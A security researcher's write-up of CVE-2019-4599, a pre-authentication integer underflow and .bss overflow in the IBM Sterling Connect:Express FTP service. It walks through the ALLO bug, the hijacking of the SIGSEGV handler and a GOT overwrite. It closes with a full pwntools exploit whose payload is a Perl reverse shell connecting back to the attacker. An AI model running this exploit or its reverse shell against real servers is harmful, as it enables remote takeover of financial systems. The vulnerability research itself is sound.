A classical penetration test requires the skills to assess a wide variety of weaknesses, most of which belong to common bug classes. Memory corruptions are rarely exploited during penetration tests, for two reasons: exploitation can be risky (you do not want to crash a production system) and time-consuming (if you have to develop or adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script, because both vendors and users tend to take patching very seriously. Nevertheless, these kinds of weaknesses may give attackers powerful primitives, such as Remote Command Execution or theft of secrets.
Furthermore, when it comes to the banking world, it is common sense that this kind of issue shall provoke a mighty fuss, especially if no patch is ever available. Nonetheless, being able to detect memory corruptions during security assessments may avoid technical or economic disasters by just decommissioning the vulnerable service.
Finally, let's be honest: legacy software is almost never audited. Most of it is decommissioned whenever possible, and what remains is almost never tested. The reason is simple: this kind of software is often very delicate to patch, so users avoid spending time on repeated vulnerability assessments. Typically, the first audit only pinpoints the most evident weaknesses. Memory corruption bugs that do not lead to a crash will almost surely not be exploited, if they are detected at all.
Consequently, I invite you to follow my analysis of CVE-2019-4599, a path I had to take during a classical penetration test. I was not expecting such a surprise at first :)
IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.
Of course, the usage of those files, as well as their content, can vary, yet they are all transferred using some exchange protocol in the end. While international standards recommend using SWIFT, French banks have been using a protocol named PeSIT since the 1980s.
Additionally, an FTP server is included in the Connect:Express software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.
Therefore, below are the main points of attacking the FTP server:
The second point is not really relevant since the implementation of FTP protocol does not seem to follow a specification that happens to be critical for the exploitation (RFC 959 p.30/31).
Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or a French/English mix. Looking at the main() function, we can see that local arguments and flags are handled using getopt(), as shown in the following screenshot:
Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process is fork()'ed and receive_commande() handles the TCP payload sent by the client. That is our main (remote) entry point:
receive_commande() basically invokes two functions:
- TCP_RECV(): calls recv()
- analyse_commande(): dispatches the FTP command to the appropriate handler
Let's first analyze TCP_RECV(). Here is a simplified version:
void* TCP_RECV(int mode)
{
    int fd;
    int cur;
    if (mode == 2) {
        // load "more data" (e.g. partial file upload)
        cur = lit_parm->buf_lg;
        fd = sock_dtp;
    } else {
[0]     cur = 0;
        fd = sock_dcp; // incoming connection socket
    }
[1] lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
    if (lit_parm->buf_lg > 0) {
        if (mode == 1) {
            if (strf == 2) {
[2]             lit_parm->buf_lg -= 2;
            } else {
                // ...
            }
        } else {
            // ...
        }
    }
    // ...
}
In other words, it fills the following struct lit_parm_t structure:
struct lit_parm_t {
    char* buf;   // pointer to user supplied data
    int buf_lg;  // length returned by recv() minus 2
    // ...
    int max_len; // max buffer length
};
In particular, lit_parm->buf holds the whole data read from the client with recv() in [1], where cur == 0 ([0]).
One might notice a very "curious" operation in [2]: lit_parm->buf_lg is decremented by 2. Honestly, I don't know why this statement exists, but it actually leads to a bug (more on this later).
lit_parm itself is a global variable pointing to data allocated on the heap in init() (invoked at startup, before fork()):
void init()
{
    // ...
    input_net = malloc(130976);
    // ...
    lit_parm = calloc(1uLL, 32uLL);
    lit_parm->buf = input_net;
    lit_parm->buf_lg = 130976;
    lit_parm->max_len = 130976;
    // ...
}
In turn, input_net is also a global variable pointing to the heap. One might notice that "130976" looks like a MAX_INPUT_SIZE for the buffer.
Once the data has been received with TCP_RECV(), receive_commande() invokes analyse_commande(), which is the main command dispatcher. analyse_commande() distinguishes two sets of commands:
From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands, or find an authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work", and having a pre-auth bug is sexier!
After a rough look at the different pre-auth commands, the focus has been set on the ALLO command.
The ALLO command (for ALLOcate) is a command that can be called in pre-authentication mode. It is used to allocate a sufficient space prior to a file upload. Typically, the next command shall be STOR for instance.
As per RFC 959, the expected grammar is:
ALLO <SP> <decimal-integer>
[<SP> R <SP> <decimal-integer>] <CRLF>
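For comparison with what the binary actually does, here is a minimal Python 3 sketch of a strict matcher for this grammar. The names ALLO_RE and parse_allo() are mine, not the vendor's, and the sketch is case-sensitive for simplicity; it is only meant to show what "well-formed" looks like before we study the real handler.

```python
import re

# Strict matcher for:
#   ALLO <SP> <decimal-integer> [<SP> R <SP> <decimal-integer>] <CRLF>
# ALLO_RE and parse_allo() are illustrative names, not taken from the binary.
ALLO_RE = re.compile(rb"ALLO ([0-9]+)(?: R ([0-9]+))?\r\n")


def parse_allo(line: bytes):
    """Return (size, record_size) or None if the line does not match the grammar."""
    match = ALLO_RE.fullmatch(line)
    if match is None:
        return None
    size = int(match.group(1))
    record_size = int(match.group(2)) if match.group(2) is not None else None
    return size, record_size


if __name__ == "__main__":
    for sample in (b"ALLO 1024\r\n", b"ALLO 1024 R 128\r\n", b"ALLO  a\r\n", b"ALLO \r\n"):
        print(sample, "->", parse_allo(sample))
```

A parser of this kind rejects an empty argument or a doubled space outright, which is worth keeping in mind for the rest of the analysis.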
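Once data has been received in TCP_RECV() (hence both lit_parm->buf and lit_parm->buf_lg have been filled), the ALLO command handler (invoked from analyse_commande()) tries to do the following:
- compute the length of the <decimal-integer> argument
- check that this argument only contains digits
- copy it into the rem_file buffer
Let's check the implementation: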
int i;
// find the number of characters of "<decimal-integer>" (stop at the first space or at the end of the data)
[0] for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
    {
    }
[1] if (verif_num(i, lit_parm->buf + 5)) {
        if (lit_parm->buf_lg - 5 < i)
            copy_len = i - 1;
        else
            copy_len = i;
[2]     memcpy(rem_file, lit_parm->buf + 5, copy_len);
        rem_file[copy_len] = 0;
        // ...
To make things simpler, let's call the string located 5 bytes past lit_parm->buf: PAYLOAD.
So, the variable i is set to the length of PAYLOAD in [0]. Then, verif_num() checks in [1] that PAYLOAD is only composed of digits. Finally, the buffer rem_file is filled with copy_len bytes of PAYLOAD in [2].
One might immediately notice that there is no length check before the memcpy() in [2]: rem_file is filled with copy_len bytes of user-controlled data (PAYLOAD). The global variable rem_file itself is stored in the .bss as a 256-byte character array.
In other words, passing the following command leads to a buffer overflow in the .bss:
ALLO 111...<252 times>...111111
^ start overflowing on the next variable in the .bss
At this point, the only "restriction" on PAYLOAD is that it must only contain digits, as enforced by verif_num(). The latter returns true if PAYLOAD is only composed of digits OR if i is zero.
This could look like the "big win" here yet "big win" does not equal "quick win" :-).
In fact, being restricted to "digit only" characters makes exploitation harder. In the next section, we will show how to bypass this restriction and overflow the rem_file buffer with almost arbitrary data.
verif_num()
In the previous section, we saw that we can trigger a buffer overflow on the .bss, but it came with a limitation: our PAYLOAD was restricted to digit characters.
First, let's have a look at the verif_num() implementation:
bool verif_num(int ctr, char *test_char)
{
    int i;
    for (i = 0; i < ctr && isdigit(test_char[i]); ++i)
    {
    }
    return i == ctr;
}
In order to pass the check, the first ctr characters of the string test_char must all be digits.
Furthermore, if ctr is set to zero, verif_num() will always return true.
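The behavior is easy to reproduce outside of the binary. Below is a small Python 3 model of verif_num(), written from the pseudo-code above; the extra bound on len(test_char) only exists to keep the Python version from raising an IndexError and has no equivalent in the original.

```python
def verif_num(ctr: int, test_char: bytes) -> bool:
    """Python model of verif_num(): are the first `ctr` bytes ASCII digits?"""
    i = 0
    # 0x30..0x39 are the ASCII digits '0'..'9' (what isdigit() accepts in the C locale).
    while i < ctr and i < len(test_char) and 0x30 <= test_char[i] <= 0x39:
        i += 1
    return i == ctr


if __name__ == "__main__":
    print(verif_num(2, b"12"))   # digits only
    print(verif_num(1, b"a"))    # not a digit
    print(verif_num(0, b"abc"))  # ctr == 0: nothing is checked at all
```

With ctr == 0 the loop body never runs, so the content of test_char is simply never looked at.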
Back to the ALLO handler code, we saw that verif_num()'s ctr parameter is the i variable computed here:
for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
and called here:
if (verif_num(i, (lit_parm->buf + 5))) {
...
}
Alright, let's analyze this part with some practical data. Here are our test cases:
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- |
| 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space |
| 1 | 'ALLO a' | 6 | 1 | false | n/a | |
| 2 | 'ALLO  1' | 7 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO  a' | 7 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 6 | 1 | true | 1 | |
| 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after |
| 6 | 'ALLO 12' | 7 | 2 | true | 2 | |
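These test cases can be replayed with a short Python 3 model of the handler's length logic. It is a sketch written from the pseudo-code shown earlier, with hypothetical names (allo_lengths(), is_digits()), and it assumes for now that lit_parm->buf_lg is simply the number of bytes received.

```python
def is_digits(ctr: int, data: bytes) -> bool:
    """Model of verif_num(): the first `ctr` bytes must be ASCII digits."""
    i = 0
    while i < ctr and i < len(data) and 0x30 <= data[i] <= 0x39:
        i += 1
    return i == ctr


def allo_lengths(buf: bytes, buf_lg: int):
    """Return (i, verif_num result, copy_len) as computed by the ALLO handler."""
    i = 0
    # Same loop as [0]: stop at the first space or at the end of the data.
    while buf_lg - 5 > i and buf[5 + i] != 0x20:
        i += 1
    if not is_digits(i, buf[5:]):
        return i, False, None
    copy_len = i - 1 if buf_lg - 5 < i else i
    return i, True, copy_len


if __name__ == "__main__":
    for case in (b"ALLO ", b"ALLO a", b"ALLO  1", b"ALLO  a", b"ALLO 1", b"ALLO 1 ", b"ALLO 12"):
        print(case, allo_lengths(case, len(case)))
```

The model only covers the arithmetic; it does not copy anything, so it is safe to run anywhere.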
As we can see in cases #0, #1, #4, #5 and #6, verif_num() behaves as expected and the i value is correctly set. In turn, copy_len equals i.
However, looking at cases #2 and #3, where two spaces are inserted after the ALLO command, we see that i is always set to zero, thus verif_num() also returns true!
That is, we reach the following code:
[0] if (lit_parm->buf_lg - 5 < i)
        copy_len = i - 1; // <---- unreachable code ?!
    else
        copy_len = i;
[1] memcpy(rem_file, lit_parm->buf + 5, copy_len);
Back to case #3, we see that our payload can be ALLO<sp><sp>a or ALLO<sp><sp>aaaaaaa... (two spaces). In other words, by using the "two spaces trick" we can put some arbitrary data in PAYLOAD.
Alas, in those cases, i is also set to zero, that is, copy_len is set to zero! An overflow of 0 bytes can hardly be called an overflow!
Now, looking back at line [0] in the previous snippet, it seems that this condition can never be true, as lit_parm->buf_lg has a minimum value of 5... or... does it?
Remember the TCP_RECV() code shown earlier? Yes, there was a "curious line" after the call to recv():
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
// ...
lit_parm->buf_lg -= 2; // <---- what the hell ?!
So yeah, our previous test cases are wrong, let's rewrite them!
Back to the computation of i, we see that if lit_parm->buf_lg is less than or equal to 5, then i will always be set to zero (the for loop never iterates). Hence, verif_num() always returns true as well!
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- |
| 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space |
| 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | |
| 2 | 'ALLO  1' | 5 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO  a' | 5 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | |
| 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after |
| 6 | 'ALLO 12' | 5 | 0 | true | 0 | |
In other words, if our PAYLOAD is zero or one character long (no matter what that character is), copy_len is set to 0xffffffff.
This is an INT UNDERFLOW baby, that leads to a huge memcpy() on the .bss!
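The wrap-around itself is plain arithmetic. The following Python 3 sketch models it under two assumptions of mine: lit_parm->buf_lg is the recv() length minus 2, and copy_len is viewed as a 32-bit unsigned value (hence the mask). copy_len_after_recv() is a hypothetical name, not a function of the binary.

```python
def copy_len_after_recv(data: bytes):
    """Model copy_len for `data` as received by TCP_RECV() (buf_lg = len - 2)."""
    buf_lg = len(data) - 2  # the "curious" adjustment made after recv()
    i = 0
    while buf_lg - 5 > i and data[5 + i] != 0x20:
        i += 1
    # verif_num(): trivially true when i == 0, digits required otherwise.
    if not all(0x30 <= b <= 0x39 for b in data[5:5 + i]):
        return None
    copy_len = i - 1 if buf_lg - 5 < i else i
    return copy_len & 0xFFFFFFFF  # -1 becomes 0xffffffff


if __name__ == "__main__":
    for data in (b"ALLO ", b"ALLO a", b"ALLO 1", b"ALLO 12", b"ALLO 12345"):
        result = copy_len_after_recv(data)
        print(data, None if result is None else hex(result))
```

Any input shorter than 7 bytes makes buf_lg - 5 negative while i stays at zero, which is exactly the branch that looked unreachable.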
We might benefit from it, yet it raises two issues:
- the ALLO command that triggers the bug carries at most one character of PAYLOAD
- such a huge memcpy() on the .bss will certainly crash the process
Back to the memcpy() called in the ALLO command handler, we saw that we can trigger a huge buffer overflow on rem_file (located in the .bss section). The code is:
memcpy(rem_file, lit_parm->buf + 5, copy_len);
As a reminder, lit_parm->buf is only ever filled by recv(), that is, with user-controlled data:
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
One thing to note is that lit_parm->buf (initialized in init() before the fork()) is NEVER RESET between recv() calls! Let's exploit this behavior to overflow the rem_file buffer with arbitrary data.
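Basically, the exploitation strategy becomes:
- send a first, large command to fill lit_parm->buf with arbitrary data
- send a short ALLO command that triggers the integer underflow: it only overwrites the first bytes of lit_parm->buf and leaves the rest of the buffer untouched.
Of course, we can only control the data up to 130971 (130976 - 5) bytes. This is because of the lit_parm->max_len restriction.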
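The "never reset" property is the whole point here, so it deserves a tiny model. The Python 3 sketch below uses a bytearray in place of lit_parm->buf and a hypothetical recv_into() helper in place of TCP_RECV(); it only shows that a short second read leaves the tail of a longer first read in place.

```python
MAX_LEN = 130976  # size of the buffer allocated in init()


def recv_into(buf: bytearray, data: bytes) -> int:
    """Model of recv() writing at offset 0 without clearing the rest of the buffer."""
    n = min(len(data), len(buf))
    buf[:n] = data[:n]
    return n


def stale_tail_demo() -> bytearray:
    buf = bytearray(MAX_LEN)
    recv_into(buf, b"X" * 5 + b"A" * 1000)  # first, long command
    recv_into(buf, b"ALLO 1")               # second, short command
    return buf


if __name__ == "__main__":
    buf = stale_tail_demo()
    print(bytes(buf[:6]))    # overwritten by the second read
    print(bytes(buf[6:16]))  # still holds bytes from the first read
```

Everything past the first six bytes still comes from the first command, and that is the data a too-long memcpy() from lit_parm->buf + 5 would pick up.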
Looking at the memory layout of the process, this will overwrite the whole .bss section before hitting an unmapped page and provoking a segfault!
That's one issue solved! There is one more though: how to exploit the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?
Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel emits a SIGSEGV signal to the process that is generally killed.
However, looking at the init() function, we see that many signal handlers are set up:
puts("init: ***** signals caught");
signal(1, 1);
signal(2, sig_fin);
signal(3, sig_fin);
signal(4, sig_fin);
signal(5, 1);
signal(6, sig_fin);
signal(8, sig_fin);
signal(7, sig_fin);
signal(11, sig_fin); // SIGSEGV
signal(31, sig_fin);
signal(13, 1);
signal(14, 1);
signal(15, sig_fin);
signal(20, 1);
signal(17, sig_chld);
signal(21, 1);
signal(22, 1);
signal(29, 1);
signal(10, sig_usr1);
signal(12, sig_usr2);
Therefore, the binary binds a signal handler to the SIGSEGV signal: sig_fin(). In other words, if our overflow provokes a SIGSEGV during the call to memcpy(), the execution flow is redirected to sig_fin().
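The raw numbers passed to signal() are not very readable. As a reading aid, here is a Python 3 lookup that decodes the calls above, assuming the target runs on Linux x86-64 (where those numbers have the meanings listed in the table, and where a handler value of 1 is SIG_IGN). The table and the describe_dispositions() helper are mine.

```python
# Signal numbers as defined on Linux x86-64 (assumption about the target platform).
LINUX_X86_64_SIGNALS = {
    1: "SIGHUP", 2: "SIGINT", 3: "SIGQUIT", 4: "SIGILL", 5: "SIGTRAP",
    6: "SIGABRT", 7: "SIGBUS", 8: "SIGFPE", 10: "SIGUSR1", 11: "SIGSEGV",
    12: "SIGUSR2", 13: "SIGPIPE", 14: "SIGALRM", 15: "SIGTERM", 17: "SIGCHLD",
    20: "SIGTSTP", 21: "SIGTTIN", 22: "SIGTTOU", 29: "SIGIO", 31: "SIGSYS",
}

# (signal number, handler) pairs copied from the init() listing; 1 means SIG_IGN.
INIT_CALLS = [
    (1, 1), (2, "sig_fin"), (3, "sig_fin"), (4, "sig_fin"), (5, 1),
    (6, "sig_fin"), (8, "sig_fin"), (7, "sig_fin"), (11, "sig_fin"),
    (31, "sig_fin"), (13, 1), (14, 1), (15, "sig_fin"), (20, 1),
    (17, "sig_chld"), (21, 1), (22, 1), (29, 1), (10, "sig_usr1"), (12, "sig_usr2"),
]


def describe_dispositions() -> dict:
    """Map each signal name to its handler name, or SIG_IGN when the handler is 1."""
    return {
        LINUX_X86_64_SIGNALS[num]: ("SIG_IGN" if handler == 1 else handler)
        for num, handler in INIT_CALLS
    }


if __name__ == "__main__":
    for name, handler in describe_dispositions().items():
        print(f"{name:8s} -> {handler}")
```

Read this way, sig_fin() handles the fatal signals (SIGSEGV, SIGBUS, SIGILL, SIGFPE, SIGABRT...) while most of the others are simply ignored.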
As shown above, the same handler is registered for several of the signals the process may receive. Let us see what sig_fin(), the handler function, does in this crude pseudo-code view:
*(trfpar + 235) = 8000;
if ( strf == 1 )
{
v3 = e_msg_gtrf;
*e_msg_gtrf->gap0 = "01";
v3->gap0[2] = '4';
}
else
{
e_msg_gtrf_ = e_msg_gtrf;
*e_msg_gtrf->gap0 = 14641;
e_msg_gtrf_->gap0[2] = 54;
}
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL); // <---- HERE
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
What we notice here is an explicit call to the GLIBC memcpy() function. Its source and destination parameters are global variables that we can overwrite with the huge buffer overflow. Ideally, e_msg_gtrf->log_buf would be clobbered to point to the zone we wish to write to, and the new value of trfpar would be a pointer to the source data to be copied.
As shown below, the variables we need to overwrite are located after rem_file, which is good news for us:
We conclude that it is possible to control the first two parameters of the memcpy() call!
Here is a simplified schema of the BSS overwrite right before the Segmentation Fault, hence the call to sig_fin():
Alright, so far we know that we have an arbitrary write primitive of exactly 1780 bytes. How can we abuse it to take control of the execution flow? We saw earlier that the shutdown function sig_fin() is the key to exploiting the service. There is, however, one compelling requirement for writing a reliable and fast exploit: since there is only one chance to control the execution flow before the process ends, the written data must directly lead to command execution if at all possible.
Ideally, we would like to call a function like system() with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, system() is not imported by the binary.
Instead, looking at the imported symbols, we figured out that only execl() was available. As a reminder, it has the following signature:
int execl(const char *path, const char *arg, ...);
More parameters have to be under our control: four, to spawn a remote shell... We will have to work around this issue. In the binary, execl() is only invoked in the r_exit() function, which is called by the "parent process" during program exit.
We have no choice but to find a way to have execl() called with controlled parameters.
One major pitfall is the copy size of the write-what-where (0x6f4 = 1780 bytes), since it is a hardcoded value. To avoid unpleasant side effects in the process, an exploit writer would rather overwrite only one of the last addresses in the .got section.
Fortunately for us, since fork() is called upon every incoming connection, a crash will not disrupt the parent service, so we can let the process crash after we obtain the mighty shell.
Before exploiting for real, let's check the enabled protections for this binary:
Full address randomization and Read-Only Relocations (RELRO) are not enabled at all. As predicted, that makes the Global Offset Table an ideal victim for good old control flow hijacking, and since the .bss section is mostly under our control, we may use it to store payloads. All we have to do is overwrite the .got entry of a GLIBC function that is called right after the arbitrary copy with a known, controlled address. Easy peasy!
As said earlier, it is safer to overwrite as few entries as possible, to reduce the chances of having the program crash or misbehave. Overwriting the last entries makes this easier.
Following the code of the segfault handler and confronting it with the .got candidates could help. What about send_tomqueue(), which is called right after the memcpy() call?
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
time() appears to be a viable candidate since it is among the first functions to run after send_tomqueue() is invoked by sig_fin(). It would allow us to take over the execution flow quickly. Unfortunately, time() does not carry any usable parameter; hijacking it directly may undermine the exploit's reliability.
However, we should keep in mind that most of the .bss is under our control, and that the software is a state machine that reads and writes globally defined variables. The only requirement is to have controlled buffer pointers in the registers dedicated to function parameters (RDI, RSI, RDX, etc.).
After a quick review, one function looks rather handy and adequate: TCP_SEND().
As shown above, env_param and sock_dcp are used here by send(), whose entry is in the latter part of the Global Offset Table. Luckily, env_param lies at 0x644778 whereas rem_file, the buffer that we initially overflowed in the .bss, lies at 0x63AF60. This means env_param can be overwritten 38936 bytes past the beginning of our buffer.
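The offset is a simple subtraction, which can be double-checked in Python 3. The constant names below are mine; the addresses are the ones quoted in the text.

```python
REM_FILE = 0x63AF60      # start of the overflowed buffer in the .bss
ENV_PARAM = 0x644778     # global used as a send() parameter in TCP_SEND()
MAX_CONTROLLED = 130976 - 5  # bytes of lit_parm->buf that follow the 5-byte prefix


def offset_from_rem_file(address: int) -> int:
    """Distance in bytes between `address` and the start of rem_file."""
    return address - REM_FILE


if __name__ == "__main__":
    offset = offset_from_rem_file(ENV_PARAM)
    print(offset, hex(offset))
    print("within controlled data:", offset + 8 <= MAX_CONTROLLED)
```

The result, 38936 (0x9818), sits comfortably inside the 130971 bytes of data we control.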
Also, to avoid losing the flow or running into unexpected crashes, we need to neutralize the .got entries placed after send() by pointing them to a ret assembly instruction. This way, any unexpected call to an imported function does nothing and returns to our normal flow.
To sum it up, the .got entry of time() should be clobbered to point to TCP_SEND(), which calls send(controlled_param1, controlled_param2, controlled_param3), and the .got entry of send() should be rewritten so that calling send() instead results in calling execl(). The latter is imported from GLIBC because it is used by a program function called r_exit().
The final call should be as such:
execl("/bin/sh", "/bin/sh", "-c", "echo win")
^- path ^- argv[0] ^- argv[1] ^- argv[2]
Hang on chingón...
Only three parameters are controlled when issuing a call to send(). Still, there is no real need to look for another function call offering control over more parameters in order to obtain command execution. Indeed, the four-parameter constraint is specific to the shell, which expects the command string as a separate argument after -c, whereas other interpreters accept the code glued to the option.
Thus, using python -c or perl -e with the code attached to the option (no quotes needed) should work, since execl() does not use a shell to spawn executable files.
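The underlying point, that arguments handed directly to exec-style calls reach the child untouched, can be checked with a harmless Python 3 experiment. The sketch below spawns the current Python interpreter without any shell and asks it to echo back its own argv; argv_seen_by_child() is a hypothetical helper of mine and has nothing to do with the target binary.

```python
import json
import subprocess
import sys


def argv_seen_by_child(*args: str) -> list:
    """Spawn a child interpreter without a shell and return the argv it received."""
    code = "import sys, json; print(json.dumps(sys.argv[1:]))"
    result = subprocess.run(
        [sys.executable, "-c", code, *args],  # list form: no shell is involved
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(result.stdout)


if __name__ == "__main__":
    # Spaces, quotes and semicolons stay inside a single argument.
    print(argv_seen_by_child("-eprint 1; print 2", 'a "quoted" word'))
```

Since no shell ever splits or unquotes the strings, one argv slot can carry an option and its whole script, whatever characters it contains.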
The command execution could then be achieved by using:
execl("/usr/bin/perl", "/usr/bin/perl", "-e[CMD]")
Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug to leak memory addresses, or to poison the .bss section much more delicately. It would also require another technique to achieve code execution, since the Global Offset Table would be read-only. For instance, new client sessions are fork()'ed into a new process that has its memory segments at the same place as the parent, so one could find the base address by attempting to write at many places and tracking crashes. Once the randomization is defeated, several techniques, such as overwriting __exit_funcs, lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as stack pivot + ROP, would be required.
A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Plus, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time constraints.
Note: A patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)
Exploit code using python2 pwntools (sorry!)
#!/usr/bin/env python2
# IBM Sterling CX FTP Service
# Version: v1.5.0.12
# cve: CVE-2019-4599
# Proof-of-Concept state
# python ftp_pesit_exploit.py -r <target_ip> -p <PORT> -l <listener_ip>
import sys, time
from optparse import OptionParser
from pwn import options, remote, listen, randoms, log, p64
parser = OptionParser()
parser.add_option("-l", "--local-addr", dest="localip",
help="Local address for connect back", metavar="LOCALADDR",
default="127.0.0.1")
parser.add_option("-Y", "--local-port", dest="localport",
help="Local port for connect back", metavar="LOCALPORT",
default="4444")
parser.add_option("-r", "--remote-addr", dest="remoteip",
help="Remote target address", metavar="REMOTEADDR",
default=None)
parser.add_option("-p", "--remote-port", dest="remoteport",
help="Remote target port", metavar="REMOTEPORT",
default=5003)
(options, args) = parser.parse_args()
if __name__ == '__main__':
if (options.remoteip is None):
log.failure("Please specify a target address and port.")
sys.exit(1)
lport = options.localport
raddr = options.remoteip
lip = options.localip
bc = listen(lport)
conn = remote(raddr, options.remoteport)
revshell = 'use Socket;$i="'
revshell += lip
revshell += '";$p='
revshell += str(lport)
revshell += ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if('
revshell += 'connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");'
revshell += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
cmd = "-eeval{" + revshell + "}"
cmd += "\x00"
bin = '/usr/bin/perl'
conn.readuntil(')')
payload = ""
payload += p64(0xB16B00B54DADD135)
payload += bin
payload += '\x00' * (16 - len(bin))
# .bss base: 0x633940
payload += p64(0) # Clean beginning
payload += p64(0x62f5d8) # pointer into the .got
payload += p64(0x63af68) # execl argv[0]
payload += p64(0x63afa0) # execl argv[1]
payload += p64(0x0)
payload += cmd
payload += randoms(840 - len(cmd))
payload += p64(0x63b2f0) # sig_fin() memcpy() source (for .got overwrite)
got = ""
got += p64(0x406d40) # overwriting send() w/ &execl@plt
got += p64(0x400534) * 29 # ret
got += p64(0x41393e) # overwriting time() w/ &TCP_SEND()
got += p64(0x400534) * 3 # ret
payload += got
payload += randoms(1792)
payload += p64(0x63af70) # filename
payload += randoms(356)
payload += p64(0x63af68) # &ptr to binary to launch
payload += randoms(4436)
payload += p64(0x6339F8) # -> FILE *struct (to fake struct)
payload += randoms(520)
payload += p64(0x63af78) # @ of (rem_file+24) (ARGV0)
payload += randoms(248)
payload += p64(0x63afa0) # ptr to shell cmd string (ARGV2)
payload += randoms(30360)
payload += p64(0x63af88) # sig_fin() memcpy dst
payload += randoms(8696)
# conn.sendline('USER LEXFO')
# conn.readuntil('please?')
# Overwrite `.bss`
conn.sendline(randoms(5) + payload) # WARNING: sendline() adds an extra '\n'
log.success('Filled lit_parm->buf with good values.')
conn.readuntil(')')
# conn.clean()
# Triggering SIGSEGV (handler!) for arbitrary write primitive
log.info(
'Making subprocess crash to obtain sig_fin() poison .bss and preempt normal flow.'
)
conn.send('ALLO 1')
bc.wait_for_connection()
conn.clean()
conn.close()
time.sleep(1)
log.success('Got shell! Enj0y')
bc.interactive()
bc.close()